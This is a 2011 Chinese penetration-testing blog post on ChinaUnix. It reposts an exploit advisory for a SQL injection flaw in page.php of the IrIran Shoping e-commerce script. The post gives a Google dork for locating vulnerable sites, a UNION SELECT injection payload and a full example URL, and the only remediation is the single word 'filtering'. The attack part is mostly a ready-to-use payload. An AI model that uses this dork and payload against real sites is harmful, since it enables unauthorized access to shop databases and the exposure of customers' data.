IrIran Shoping Script SQL注入漏洞及修-oma-ChinaUnix博客

渗透

首页　| 　博文目录　| 　关于我

oma

博客访问： 2284541
博文数量： 181
博客积分： 9990
博客等级：中将
技术积分： 1865
用户组：普通用户
注册时间： 2006-05-23 09:43

文章分类

全部博文（181）

cms（2）

phpcms（2）
好友专区（1）
oracle专题（2）
windows（5）
渗透技巧总结（34）

linux（4）
渗透工具（25）
webshell（2）
asp专题（36）
aspx专题（2）
php专题（41）
免杀专题（1）
提权相关（2）
asp木马（1）
休闲心情（10）
其它（17）
未分配的博文（0）

文章存档

2011年（40）

2010年（17）

2009年（87）

2008年（37）

我的朋友

相关博文

IrIran Shoping Script SQL注入漏洞及修

分类：网络与安全

2011-04-01 15:57:03

IrIran Shoping是一款在线电子商务系统，IrIran Shoping中的page.php存在SQL注入漏洞，可能导致敏感信息泄露。
　　[+]info:
　　~~~~~~~~~
　　[~] Title     : IrIran Shoping Script SQL Injection Vulnerability
　　[~] Author    : Net.Edit0r
　　[~] Vendor or Software Link :
　　[~] Email     :
　　[~] Data : 2011-03-29
　　[~] Google dork: "Powered by: IRIran.net"
　　[~] Category: [Webapps]
　　[~] Tested on: [Linux /php]
　　[+]poc:
　　~~~~~~~~~
　　[~] Vulnerable File :
　　http://oma.cublog.cn/products/page.php?id=[SQL]
　　[~] ExploiT         :
　　-10+UnIoN+SeleCt+1,2,3,4,5,6,7,8,9,10,11--
　　[~] Example         :
　　http://oma.cublog.cn/products/page.php?id=-10+UnIoN+SeleCt+1,2,3,4,5,6,7,8,9,10,11--
　　[~] Demo            :
　　--
　　修复：过滤

阅读(581) | 评论(0) | 转发(0) |

上一篇：牧星php网站信息管理系统session欺骗0day及修复

下一篇：浙大盘石企业建站系统注入及修复

给主人留下些什么吧！~~

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6